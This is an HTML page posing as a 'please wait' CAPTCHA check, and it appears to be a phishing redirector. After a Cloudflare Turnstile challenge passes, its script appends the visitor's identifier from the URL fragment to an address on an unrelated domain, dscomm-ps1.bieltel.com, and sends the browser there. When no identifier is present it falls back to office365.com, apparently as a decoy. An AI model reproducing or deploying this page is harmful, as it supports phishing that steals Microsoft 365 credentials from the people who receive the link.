<!DOCTYPE html>
<html lang="en">
 <head>
  <meta content="width=device-width,initial-scale=1" name="viewport"/>
  <title>
   ..........please wait.........
  </title>
  <style>
   #recaptcha {
        margin: 50% auto;
        text-align: center;
    }
  </style>
  <script crossorigin="anonymous" integrity="sha512-bLT0Qm9VnAYZDflyKcBaQ2gg0hSYNQrJ8RilYldYQ1FxQYoCLtUjuuRuZo+fjqhx/qtq/1itJ0C2ejDxltZVFg==" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js">
  </script>
  <script async="" defer="" src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback">
  </script>
  <script>
   function get() {
        var o = "https://dscomm-ps1.bieltel.com/?username=";
        var i = window.location.hash;
        if (i) var t = o + "" + i.split("#")[1]; else var t = "https://office365.com";
        window.open(t, "_self")
    }
  </script>
  <script>
   window.onloadTurnstileCallback = function () {
            turnstile.render('#recaptcha', {
                sitekey: '0x4AAAAAAALrrTMPYGD0BkeT', callback: function (token) {
                    get();
                },
            });
        }
  </script>
 </head>
 <body>
  <div data-theme="light" id="recaptcha">
  </div>
 </body>
</html>